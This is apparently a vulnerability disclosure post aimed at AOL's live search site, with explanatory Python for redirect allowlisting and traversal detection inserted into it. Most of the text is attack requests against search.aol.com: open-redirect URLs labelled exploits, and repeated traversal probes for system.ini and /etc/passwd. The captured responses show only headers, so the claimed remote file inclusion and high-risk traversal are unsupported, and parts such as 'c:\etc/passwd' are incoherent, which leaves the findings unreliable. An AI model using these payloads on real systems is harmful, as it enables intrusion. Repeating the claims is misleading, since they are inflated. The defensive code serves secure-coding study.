@AOL REMOTE FILE INCLUSION aka RFI / Path TRAVERSAL / URL Redirect (& More...) ;)


AOL Remote File Inclusion / Path Traversal / URL Redirect (& More...)
***************************************************************











Vulnerability Timeline
**********************

- Multiple security advisories sent

BUT THE VENDOR NEVER RESPONDED

I don't believe it... Common sense does not exist OR they are very pushy







I. VULNERABILITY
****************

#Title: AOL Remote File Inclusion / Path Traversal / CSRF and More
#Vendor: http://www.aol.com
#Author: @Lord0fTheWar (@HabemusCurso Security Trainer / Red Teamer)
#Red Teams Trainer: http://habemuscurso.blogspot.com






II. BRIEF DESCRIPTION
*********************

AOL Inc. (previously known as America Online, written as AOL and styled as "Aol." but commonly pronounced as an initialism) is an American multinational mass media corporation based in New York City that develops, grows, and invests in brands and web sites. The company's business spans digital distribution of content, products, and services, which it offers to consumers, publishers, and advertisers.

Founded in 1983 as Control Video Corporation, an online services company set up by Jim Kimsey from the remnants of Control Video Corporation, AOL has franchised its services to companies in several nations around the world or set up international versions of its services. AOL is headquartered at 770 Broadway in New York.



                                   



REMOTE FILE INCLUSION aka RFI
*****************************

Risk: High
Confidence: Medium
Parameter: s_cu
CWE id: 98
WASC id: 5






Description
***********

Remote File Include (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications. When web applications take user input (URL, parameter value, etc.) and pass it into file include commands, the web application might be tricked into including remote files with malicious code.

Almost all web application frameworks support file inclusion. File inclusion is mainly used for packaging common code into separate files that are later referenced by main application modules. When a web application references an include file, the code in this file may be executed implicitly or explicitly by calling specific procedures. If the choice of module to load is based on elements from the HTTP request, the web application might be vulnerable to RFI.

An attacker can use RFI for:

 * Running malicious code on the server: any code in the included malicious files will be run by the server. If the file include is not executed using some wrapper, code in include files is executed in the context of the server user. This could lead to a complete system compromise.

 * Running malicious code on clients: the attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, JavaScript to steal the client's session cookies).

PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" in PHP programming and due to default server configurations that increase susceptibility to an RFI attack.
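The description above concerns include mechanisms driven by request data; the proofs of concept that follow place an external URL in the s_cu parameter together with s_cd=prefRedir, so what the responses directly show is a redirect to a caller-chosen URL (the "URL Redirect" of the title, CWE-601). The fix for both problems has the same shape: the request value only selects from a fixed allowlist and never reaches the include or redirect call unchecked. The Python below is an added example written for this advisory, not AOL code; the module table, the allowed hosts and the parameter names are constructed assumptions.

```python
"""Allowlist handling for request-controlled include names and redirect
targets. Added example for this advisory, not AOL code: the module table,
the allowed hosts and the parameter names are constructed assumptions."""
from urllib.parse import urlsplit

# Constructed: the only include modules the application knows about.
# The request value picks a key; the file path itself never comes from
# the request, which removes the CWE-98 condition entirely.
INCLUDE_MODULES = {
    "settings": "modules/settings.inc",
    "prefs": "modules/prefs.inc",
}

# Constructed: hosts a redirect parameter (such as s_cu) may point at.
ALLOWED_REDIRECT_HOSTS = {"search.example.com", "www.example.com"}


def resolve_include(module_name):
    """Return the fixed include path for a known module name, else None."""
    return INCLUDE_MODULES.get(module_name)


def safe_redirect_target(value, fallback="/"):
    """Return `value` when it is a safe redirect destination, else `fallback`.

    Accepted: a site-relative path ("/aol/settings") or an absolute http(s)
    URL whose host is allowlisted. Everything else falls back: protocol-
    relative "//host", non-http schemes such as javascript:, userinfo tricks
    ("https://good@evil"), header-injection characters, and backslashes
    (which some browsers treat as slashes).
    """
    if not value or any(ch in value for ch in "\\\r\n\x00"):
        return fallback
    try:
        parts = urlsplit(value)
    except ValueError:          # e.g. malformed IPv6 literal
        return fallback
    if not parts.scheme and not parts.netloc:
        # Relative target: must be a single-slash site path.
        if value.startswith("/") and not value.startswith("//"):
            return value
        return fallback
    if parts.scheme.lower() not in ("http", "https"):
        return fallback
    if parts.username is not None or parts.password is not None:
        return fallback
    host = (parts.hostname or "").lower()
    return value if host in ALLOWED_REDIRECT_HOSTS else fallback


if __name__ == "__main__":
    # Constructed sample values, one shaped like the s_cu values in this
    # advisory (an external URL the site has no reason to redirect to).
    for candidate in ["/aol/settings", "http://www.youtube.com/watch?v=x",
                      "//evil.example/", "https://www.example.com/prefs",
                      "https://www.example.com@evil.example/", "javascript:alert(1)"]:
        print(f"{candidate!r:45} -> {safe_redirect_target(candidate)!r}")
    print(resolve_include("settings"), resolve_include("http://evil.example/x.txt"))
```

The allowlist comparison is done on the parsed hostname, not on a substring of the raw URL, which is what defeats the userinfo and protocol-relative forms; a substring check such as "contains aol.com" would pass "https://aol.com@evil.example/".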






PROOF OF CONCEPT
*************************



                                                                                                                                                                                                                                                                                    |
         # # # #  # # 
        #                                                                          
        #                                                         
         # #  #        # # # # # #       # # # # # # #             
                 #     #                      #
                #     # #######       #                                                                                                       
              #      # #######       #
             #      #                     #
   # # # #       #  # # # # #      # # # # # #  #     



This FIRST EXPLOIT is dedicated to the person who was my Sec trainer and friend; we've been together 17 years...

And today this friendship continues ;) Thank you for all, Master






FIRST EXPLOIT
****************


 http://search.aol.com/aol/setprefsr?queryautocomppref=1&s_cm=content_searchsuggestion&src=PREFS&s_cd=prefRedir&s_cu=http%3A%2F%2Fwww.youtube.com/watch?v=GC04S7rbhvI#t=4499      


SECOND EXPLOIT
**************


http://search.aol.com/aol/setprefsr?s_cm=settings&sp_rl=1&src=PREFS&s_cd=prefRedir&s_cu=http%3A%2F%2Fhabemuscurso.blogspot.com%2F&openInNewWindowPref=true



THIRD EXPLOIT
*****************


http://search.aol.com/aol/setprefsr?queryautocomppref=1&s_cm=content_searchsuggestion&src=PREFS&s_cd=prefRedir&s_cu=http%3A%2F%2Ftwitter.com/lord0fthewar%2F&sp_qs=1




FOURTH EXPLOIT
*******************


http://search.aol.com/aol/setprefsr?s_cm=settings&src=PREFS&safesearch=4&s_cd=prefRedir&sp_ss=1&s_cu=http://habemuscurso.blogspot.com.es/2015/05/alert-you-must-have-common-sense.html








PATH TRAVERSAL
**************

Risk: High
Confidence: Medium
Parameter: q
Attack: [drivers]
CWE id: 22
WASC id: 33





Description
***********

The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the web server. Any device that exposes an HTTP-based interface is potentially vulnerable to Path Traversal.

Most web sites restrict user access to a specific portion of the file-system, typically called the "web document root" or "CGI root" directory. These directories contain the files intended for user access and the executables necessary to drive web application functionality. To access files or execute commands anywhere on the file-system, Path Traversal attacks utilize special-character sequences.

The most basic Path Traversal attack uses the "../" special-character sequence to alter the resource location requested in the URL. Although most popular web servers will prevent this technique from escaping the web document root, alternate encodings of the "../" sequence may help bypass the security filters. These method variations include valid and invalid Unicode encoding ("..%u2216" or "..%c0%af") of the forward slash character, backslash characters ("..\") on Windows-based servers, URL-encoded characters ("%2e%2e%2f"), and double URL encoding ("..%255c") of the backslash character.

Even if the web server properly restricts Path Traversal attempts in the URL path, a web application itself may still be vulnerable due to improper handling of user-supplied input. This is a common problem of web applications that use template mechanisms or load static text from files. In variations of the attack, the original URL parameter value is substituted with the file name of one of the web application's dynamic scripts. Consequently, the results can reveal source code because the file is interpreted as text instead of an executable script. These techniques often employ additional special characters such as the dot (".") to reveal the listing of the current working directory, or NULL characters in order to bypass rudimentary file extension checks.
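The description lists several encodings of the traversal sequence (URL encoding, double encoding, overlong UTF-8, backslashes, NUL bytes). A defence has to undo those encodings before it decides anything, and then confine the result to the document root rather than filter for known bad strings. The Python below is an added example for this advisory, not AOL code: DOC_ROOT, the parameter values and the access-log lines are constructed (the log lines are shaped like the q= requests in the proofs of concept that follow). The same decoding step doubles as a detector over log values, which the last two functions show.

```python
"""Path-traversal defence and detection. Added example for this advisory,
not AOL code: DOC_ROOT, the sample values and the log lines are constructed."""
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

DOC_ROOT = "/srv/www/docroot"   # constructed example document root
REPLACEMENT = "\ufffd"          # what unquote() emits for bytes that are not valid UTF-8


def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing, so that double-encoded
    sequences such as '..%255c' are seen as the server would eventually see
    them. Returns None if the value is still changing after `max_rounds`."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    return None


def resolve_under_root(user_path, root=DOC_ROOT):
    """Map a request-supplied path onto a file under `root`, or return None.

    Rejects NUL bytes (used to truncate extension checks), backslashes
    (Windows separators), drive-letter prefixes, and overlong UTF-8 such as
    '..%c0%af' (which unquote() turns into U+FFFD). Absolute paths are
    re-rooted and '..' is normalised away before the containment check.
    Normalisation here is lexical; in production also resolve symlinks
    (os.path.realpath) before comparing against the root.
    """
    decoded = decode_fully(user_path)
    if decoded is None:
        return None
    if any(ch in decoded for ch in ("\x00", "\\", REPLACEMENT)):
        return None
    if ":" in decoded.split("/")[0]:          # e.g. "c:/Windows/system.ini"
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


# Markers matched against the fully decoded, lower-cased value.
TRAVERSAL_MARKERS = ("../", "..\\", "etc/passwd", "etc\\passwd",
                     ":\\windows\\", ":/windows/", "\x00", REPLACEMENT)


def flag_traversal_attempt(param_value):
    """Detection side: True when a decoded query-parameter value carries a
    traversal marker, or is still encoded after several decoding rounds."""
    decoded = decode_fully(param_value)
    if decoded is None:
        return True
    lowered = decoded.lower()
    return any(marker in lowered for marker in TRAVERSAL_MARKERS)


def scan_access_log(lines, params=("q", "as_rq")):
    """Return (line_no, param, value) for combined-format log lines whose
    search parameters look like traversal attempts."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        try:
            request_target = line.split('"')[1].split(" ")[1]
        except IndexError:
            continue                              # not a request line we understand
        query = parse_qs(urlsplit(request_target).query)
        for name in params:
            for value in query.get(name, []):     # parse_qs decodes one round already
                if flag_traversal_attempt(value):
                    hits.append((line_no, name, value))
    return hits


# Constructed log lines in Apache combined format; the second and third
# carry the kind of q= values shown in this advisory's proofs of concept.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/May/2015:16:06:28 +0000] "GET /aol/search?q=Lordothewar&s_it=searchbox.webhome HTTP/1.1" 200 5120',
    '10.0.0.9 - - [13/May/2015:16:06:29 +0000] "GET /aol/search?q=c%3A%5CWindows%5Csystem.ini&s_it=searchtabs HTTP/1.1" 200 5120',
    '10.0.0.9 - - [13/May/2015:16:09:54 +0000] "GET /aol/search?q=c%3A%5Cetc%2Fpasswd&s_it=opensearch HTTP/1.1" 200 5120',
]
```

A search parameter such as q should never reach a filesystem call at all; the resolver is for the case where a parameter legitimately names a file. The detector is deliberately run on decoded values, since a rule matching the literal string "../" in the raw URL misses every encoded variant the description lists.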




PROOF OF CONCEPT
----------------

Path Traversal (10 instances)

1

Risk: High
Confidence: Medium
Parameter: as_rq
Attack: [drivers]
CWE id: 22
WASC id: 33




http://search.aol.com/aol/search?as_rq=c%3A%5CWindows%5Csystem.ini&s_it=advancedSearch&btnG=Search&v_t=errordocument_404  HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/advanced?v_t=errordocument_404
Host: search.aol.com


Response:



HTTP/1.1 200 OK


Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com

Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=-2629034018615354918
Set-Cookie: s_guid="ee6dc9ef3eaa42a8a43af632384c14fb:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:56:44 GMT; Path=/
Set-Cookie: MVT_TBP=f1|858|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 15:56:44 GMT; Path=/
Set-Cookie: MVT_TBV=f1|171; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|858|20150513|20150513|SLclicktxtOff:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:56:44 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 19:10:51 GMT
Set-Cookie: ie6Promotion_start_time=1431532604506; Expires=Mon, 31-May-2083 19:10:51 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US




2

Risk: High
Confidence: Medium
Parameter: as_rq
Attack: [drivers]
CWE id: 22
WASC id: 33



http://search.aol.com/aol/search?as_rq=c%3A%5CWindows%5Csystem.ini&s_it=advancedSearch&btnG=Search&v_t=na&oreq=5d12c591a00f4f3bb9ef6fbdd8b8b885 HTTP/1.1



User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)

Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/settings?oreq=704c2df02ed94266af0023622359d55c&v_t=na
Host: search.aol.com


Response




HTTP/1.1 200 OK


Date: Wed, 13 May 2015 17:15:44 GMT

Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=-310996711283562025
Set-Cookie: s_guid="58d537cbe21444989dcbcd4791417d58:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 17:15:44 GMT; Path=/
Set-Cookie: MVT_TBP=f1|59|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 17:15:44 GMT; Path=/
Set-Cookie: MVT_TBV=f1|1; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|59|20150513|20150513|csa_web_slinkhcsl:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 17:15:44 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 20:29:52 GMT
Set-Cookie: ie6Promotion_start_time=1431537345018; Expires=Mon, 31-May-2083 20:29:52 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US




3

Risk: High
Confidence: Medium
Parameter: q
Attack: [drivers]
CWE id: 22
WASC id: 33



http://search.aol.com/aol/search?q=c%3A%5CWindows%5Csystem.ini&s_it=botm_relsearch&s_cs=9190864025906731353&v_t=na HTTP/1.1



User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)

Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/search?q=Lordothewar&s_it=searchbox.webhome&v_t=na
Host: search.aol.com



Response




HTTP/1.1 200 OK

Date: Wed, 13 May 2015 16:06:28 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=9190864025906731353
Set-Cookie: s_guid="9dd06d2ce5504c4d877140b3c081cfe9:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:06:28 GMT; Path=/
Set-Cookie: MVT_TBP=f1|909|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 16:06:28 GMT; Path=/
Set-Cookie: MVT_TBV=f1|489; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|909|20150513|20150513|SLclicktxtOff:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:06:28 GMT; Path=/
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-U




4

Risk: High
Confidence: Medium
Parameter: q
Attack: [Drivers]
CWE id: 22
WASC id: 33



http://search.aol.com/aol/search?q=c%3A%5CWindows%5Csystem.ini&s_it=searchtabs&v_t=na HTTP/1.1



User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)

Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/tracking?d_ch=en_US_search&q=%7BsearchTerms%7D&s_ch=en_US_network&s_it=searchtabs&v_t=na
Host: search.aol.com




Response



HTTP/1.1 200 OK


Date: Wed, 13 May 2015 15:43:01 GMT

Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=3685746043036587394
Set-Cookie: s_guid="0fb8527bb84a413cbede2ece2fc75304:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:43:01 GMT; Path=/
Set-Cookie: MVT_TBP=f1|618|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 15:43:01 GMT; Path=/
Set-Cookie: MVT_TBV=f1|831; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|618|20150513|20150513|SLclicktxtOff_CNTL2:1+Ggray_CNTL2:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:43:01 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 18:57:08 GMT
Set-Cookie: ie6Promotion_start_time=1431531781160; Expires=Mon, 31-May-2083 18:57:08 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US






5

Risk: High
Confidence: Medium
Parameter: q
Attack: root:x:0:0
CWE id: 22
WASC id: 33



http://search.aol.com/aol/search?q=c%3A%5Cetc%2Fpasswd&s_it=opensearch HTTP/1.1



User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)

Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/assets/en/US/aolcom/0860zaolr06/opensearch.xml
Host: search.aol.com



HTTP/1.1 200 OK

Date: Wed, 13 May 2015 15:44:18 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=-995681965050725470
Set-Cookie: s_guid="e8ab8fb75f0b493982fe3186dc6e0f52:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:44:18 GMT; Path=/
Set-Cookie: MVT_TBP=f1|9|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 15:44:18 GMT; Path=/
Set-Cookie: MVT_TBV=f1|158; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|9|20150513|20150513|csa_web_slinkhcsl:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:44:18 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 18:58:25 GMT
Set-Cookie: ie6Promotion_start_time=1431531858597; Expires=Mon, 31-May-2083 18:58:25 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US




6

Risk: High
Confidence: Medium
Parameter: q
Attack: root:x:0:0
CWE id: 22
WASC id: 33




HTTP/1.1 200 OK

Date: Wed, 13 May 2015 16:55:50 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=1894788125986043588
Set-Cookie: s_guid="db2f65f7bfa2491085a63b2f6f6278f2:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:55:50 GMT; Path=/
Set-Cookie: MVT_TBP=f1|467|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 16:55:50 GMT; Path=/
Set-Cookie: MVT_TBV=f1|954; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|467|20150513|20150513|SLclicktxtOff_CNTL1:1+Ggray_CNTL1:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:55:50 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 20:09:57 GMT
Set-Cookie: ie6Promotion_start_time=1431536150237; Expires=Mon, 31-May-2083 20:09:57 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US





7

Risk: High
Confidence: Medium
Parameter: q
Attack: root:x:0:0
CWE id: 22
WASC id: 33



http://search.aol.com/aol/search?q=c%3A%5Cetc%2Fpasswd&s_it=opensearch&v_t=na&oreq=f5d42ea2baa548c08c5f03d13dc91b7d&page=2 HTTP/1.1



User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)

Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/search?amp;s_it=opensearch&q=%7BsearchTerms%7D
Host: search.aol.com




Response:




HTTP/1.1 200 OK

Date: Wed, 13 May 2015 16:09:54 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=3691178351082888093
Set-Cookie: s_guid="db513787f6fc4b4ebbea4cd527103f38:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:09:54 GMT; Path=/
Set-Cookie: MVT_TBP=f1|163|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 16:09:54 GMT; Path=/
Set-Cookie: MVT_TBV=f1|160; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|163|20150513|20150513|csa_web_slinkon_CNTL1:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:09:54 GMT; Path=/
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US





8

Risk: High
Confidence: Medium
Parameter: q
Attack: root:x:0:0
CWE id: 22
WASC id: 33


http://search.aol.com/aol/search?q=c%3A%5Cetc%2Fpasswd&s_it=channel_redir_fail HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)

Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/tracking
Host: search.aol.com




Response:



HTTP/1.1 200 OK

Date: Wed, 13 May 2015 15:58:04 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=-8989857396616909336
Set-Cookie: s_guid="6eee3cb53dce47a28cd5b8367071d70f:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:58:04 GMT; Path=/
Set-Cookie: MVT_TBP=f1|43|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 15:58:04 GMT; Path=/
Set-Cookie: MVT_TBV=f1|400; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|43|20150513|20150513|csa_web_slinkhcsl:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:58:05 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 19:12:12 GMT
Set-Cookie: ie6Promotion_start_time=1431532685069; Expires=Mon, 31-May-2083 19:12:12 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US





9

Risk: High
Confidence: Medium
Parameter: q
Attack: root:x:0:0
CWE id: 22
WASC id: 33



 http://search.aol.com/aol/search?q=c%3A%5Cetc%2Fpasswd&s_it=searchbox.webhome&v_t=na&oreq=1f374aa083034aa58588b5b21cd39f7f HTTP/1.1



